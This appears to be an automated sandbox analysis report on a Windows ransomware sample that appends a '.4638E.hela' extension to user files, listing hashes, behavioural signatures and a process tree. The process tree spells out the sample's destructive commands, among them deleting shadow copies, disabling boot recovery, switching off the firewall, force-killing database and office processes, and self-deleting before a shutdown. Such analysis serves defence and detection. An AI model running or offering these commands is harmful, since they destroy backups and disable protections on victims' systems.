Analysis
-
max time kernel
57s -
max time network
83s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
27-07-2021 03:33
Static task
static1
Behavioral task
behavioral1
Sample
730DBBFB.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
730DBBFB.exe
Resource
win10v20210408
Errors
General
-
Target
730DBBFB.exe
-
Size
169KB
-
MD5
65c3956288e16bdcc55e3c9c6b94ba5b
-
SHA1
33aa83e00711a32e0960dcf670ae2fa891049170
-
SHA256
e7fe3b83e1730593d372b5a848e84066c07d75ee4790395a258822cfb8502412
-
SHA512
813db16eeacf96589468881872ec15e55760dacf27f90060298972036ab22243337abd5f9bce266063a89fccc45ded069cb4bb4172946acc4a54e5ac49853c76
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1332 bcdedit.exe 1372 bcdedit.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
730DBBFB.exedescription ioc process File renamed C:\Users\Admin\Pictures\GroupInstall.raw => C:\Users\Admin\Pictures\GroupInstall.raw.4638E.hela 730DBBFB.exe File renamed C:\Users\Admin\Pictures\ExitEnter.png => C:\Users\Admin\Pictures\ExitEnter.png.4638E.hela 730DBBFB.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2656 cmd.exe -
Drops file in Program Files directory 2 IoCs
Processes:
730DBBFB.exedescription ioc process File opened for modification C:\Program Files\ResumeExpand.sql 730DBBFB.exe File created C:\Program Files\!!Read_Me.4638E.html 730DBBFB.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 820 vssadmin.exe -
Kills process with taskkill 13 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1300 taskkill.exe 640 taskkill.exe 1812 taskkill.exe 2164 taskkill.exe 2144 taskkill.exe 228 taskkill.exe 2244 taskkill.exe 2256 taskkill.exe 1192 taskkill.exe 2012 taskkill.exe 1936 taskkill.exe 2080 taskkill.exe 2232 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
Processes:
WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeshutdown.exeAUDIODG.EXEdescription pid process Token: SeIncreaseQuotaPrivilege 824 WMIC.exe Token: SeSecurityPrivilege 824 WMIC.exe Token: SeTakeOwnershipPrivilege 824 WMIC.exe Token: SeLoadDriverPrivilege 824 WMIC.exe Token: SeSystemProfilePrivilege 824 WMIC.exe Token: SeSystemtimePrivilege 824 WMIC.exe Token: SeProfSingleProcessPrivilege 824 WMIC.exe Token: SeIncBasePriorityPrivilege 824 WMIC.exe Token: SeCreatePagefilePrivilege 824 WMIC.exe Token: SeBackupPrivilege 824 WMIC.exe Token: SeRestorePrivilege 824 WMIC.exe Token: SeShutdownPrivilege 824 WMIC.exe Token: SeDebugPrivilege 824 WMIC.exe Token: SeSystemEnvironmentPrivilege 824 WMIC.exe Token: SeRemoteShutdownPrivilege 824 WMIC.exe Token: SeUndockPrivilege 824 WMIC.exe Token: SeManageVolumePrivilege 824 WMIC.exe Token: 33 824 WMIC.exe Token: 34 824 WMIC.exe Token: 35 824 WMIC.exe Token: SeIncreaseQuotaPrivilege 824 WMIC.exe Token: SeSecurityPrivilege 824 WMIC.exe Token: SeTakeOwnershipPrivilege 824 WMIC.exe Token: SeLoadDriverPrivilege 824 WMIC.exe Token: SeSystemProfilePrivilege 824 WMIC.exe Token: SeSystemtimePrivilege 824 WMIC.exe Token: SeProfSingleProcessPrivilege 824 WMIC.exe Token: SeIncBasePriorityPrivilege 824 WMIC.exe Token: SeCreatePagefilePrivilege 824 WMIC.exe Token: SeBackupPrivilege 824 WMIC.exe Token: SeRestorePrivilege 824 WMIC.exe Token: SeShutdownPrivilege 824 WMIC.exe Token: SeDebugPrivilege 824 WMIC.exe Token: SeSystemEnvironmentPrivilege 824 WMIC.exe Token: SeRemoteShutdownPrivilege 824 WMIC.exe Token: SeUndockPrivilege 824 WMIC.exe Token: SeManageVolumePrivilege 824 WMIC.exe Token: 33 824 WMIC.exe Token: 34 824 WMIC.exe Token: 35 824 WMIC.exe Token: SeBackupPrivilege 1940 vssvc.exe Token: SeRestorePrivilege 1940 vssvc.exe Token: SeAuditPrivilege 1940 vssvc.exe Token: SeDebugPrivilege 1192 taskkill.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 640 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 2080 taskkill.exe Token: SeDebugPrivilege 2144 taskkill.exe Token: SeDebugPrivilege 2164 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 2244 taskkill.exe Token: SeDebugPrivilege 228 taskkill.exe Token: SeShutdownPrivilege 2716 shutdown.exe Token: SeRemoteShutdownPrivilege 2716 shutdown.exe Token: 33 2796 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2796 AUDIODG.EXE Token: 33 2796 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2796 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
730DBBFB.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 592 wrote to memory of 1908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1928 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1928 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1928 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1928 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2008 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2008 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2008 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2008 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2028 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2028 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2028 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2028 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2032 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2032 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2032 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 2032 592 730DBBFB.exe cmd.exe PID 2028 wrote to memory of 1372 2028 cmd.exe bcdedit.exe PID 2028 wrote to memory of 1372 2028 cmd.exe bcdedit.exe PID 2028 wrote to memory of 1372 2028 cmd.exe bcdedit.exe PID 2032 wrote to memory of 1228 2032 cmd.exe netsh.exe PID 2032 wrote to memory of 1228 2032 cmd.exe netsh.exe PID 2032 wrote to memory of 1228 2032 cmd.exe netsh.exe PID 1928 wrote to memory of 824 1928 cmd.exe WMIC.exe PID 1928 wrote to memory of 824 1928 cmd.exe WMIC.exe PID 1928 wrote to memory of 824 1928 cmd.exe WMIC.exe PID 2008 wrote to memory of 1332 2008 cmd.exe bcdedit.exe PID 2008 wrote to memory of 1332 2008 cmd.exe bcdedit.exe PID 2008 wrote to memory of 1332 2008 cmd.exe bcdedit.exe PID 1908 wrote to memory of 820 1908 cmd.exe vssadmin.exe PID 1908 wrote to memory of 820 1908 cmd.exe vssadmin.exe PID 1908 wrote to memory of 820 1908 cmd.exe vssadmin.exe PID 592 wrote to memory of 908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 908 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1452 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1452 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1452 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1452 592 730DBBFB.exe cmd.exe PID 908 wrote to memory of 1192 908 cmd.exe taskkill.exe PID 908 wrote to memory of 1192 908 cmd.exe taskkill.exe PID 908 wrote to memory of 1192 908 cmd.exe taskkill.exe PID 908 wrote to memory of 1192 908 cmd.exe taskkill.exe PID 592 wrote to memory of 1772 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1772 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1772 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1772 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1504 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1504 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1504 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1504 592 730DBBFB.exe cmd.exe PID 1452 wrote to memory of 1300 1452 cmd.exe taskkill.exe PID 1452 wrote to memory of 1300 1452 cmd.exe taskkill.exe PID 1452 wrote to memory of 1300 1452 cmd.exe taskkill.exe PID 1452 wrote to memory of 1300 1452 cmd.exe taskkill.exe PID 592 wrote to memory of 564 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 564 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 564 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 564 592 730DBBFB.exe cmd.exe PID 592 wrote to memory of 1172 592 730DBBFB.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {current} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd.exe /c netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im note*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im note*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im powerpnt*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powerpnt*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im tomcat*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tomcat*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im java*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im java*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im vee*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vee*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im post*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im post*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im mys*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mys*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im python*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im apache*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im sql*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im Exchange*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im excel*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im winword*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe & shutdown -s -t 02⤵
- Deletes itself
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\shutdown.exeshutdown -s -t 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Exchange*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im python*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apache*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5781⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/220-83-0x0000000000000000-mapping.dmp
-
memory/228-82-0x0000000000000000-mapping.dmp
-
memory/564-79-0x0000000000000000-mapping.dmp
-
memory/592-60-0x0000000010000000-0x000000001001C000-memory.dmpFilesize
112KB
-
memory/640-84-0x0000000000000000-mapping.dmp
-
memory/820-71-0x0000000000000000-mapping.dmp
-
memory/824-69-0x0000000000000000-mapping.dmp
-
memory/908-73-0x0000000000000000-mapping.dmp
-
memory/1072-89-0x0000000000000000-mapping.dmp
-
memory/1172-80-0x0000000000000000-mapping.dmp
-
memory/1192-75-0x0000000000000000-mapping.dmp
-
memory/1228-68-0x0000000000000000-mapping.dmp
-
memory/1228-72-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmpFilesize
8KB
-
memory/1300-78-0x0000000000000000-mapping.dmp
-
memory/1332-70-0x0000000000000000-mapping.dmp
-
memory/1372-67-0x0000000000000000-mapping.dmp
-
memory/1452-74-0x0000000000000000-mapping.dmp
-
memory/1504-77-0x0000000000000000-mapping.dmp
-
memory/1580-90-0x0000000000000000-mapping.dmp
-
memory/1612-88-0x0000000000000000-mapping.dmp
-
memory/1772-76-0x0000000000000000-mapping.dmp
-
memory/1812-87-0x0000000000000000-mapping.dmp
-
memory/1908-62-0x0000000000000000-mapping.dmp
-
memory/1928-63-0x0000000000000000-mapping.dmp
-
memory/1936-86-0x0000000000000000-mapping.dmp
-
memory/1964-81-0x0000000000000000-mapping.dmp
-
memory/2008-64-0x0000000000000000-mapping.dmp
-
memory/2012-85-0x0000000000000000-mapping.dmp
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2032-66-0x0000000000000000-mapping.dmp
-
memory/2052-91-0x0000000000000000-mapping.dmp
-
memory/2080-92-0x0000000000000000-mapping.dmp
-
memory/2108-93-0x0000000000000000-mapping.dmp
-
memory/2144-94-0x0000000000000000-mapping.dmp
-
memory/2164-95-0x0000000000000000-mapping.dmp
-
memory/2232-96-0x0000000000000000-mapping.dmp
-
memory/2244-97-0x0000000000000000-mapping.dmp
-
memory/2256-98-0x0000000000000000-mapping.dmp
-
memory/2656-99-0x0000000000000000-mapping.dmp
-
memory/2684-100-0x0000000000000000-mapping.dmp
-
memory/2716-101-0x0000000000000000-mapping.dmp
-
memory/2744-103-0x0000000002840000-0x0000000002841000-memory.dmpFilesize
4KB
-
memory/2948-105-0x00000000026E0000-0x00000000026E1000-memory.dmpFilesize
4KB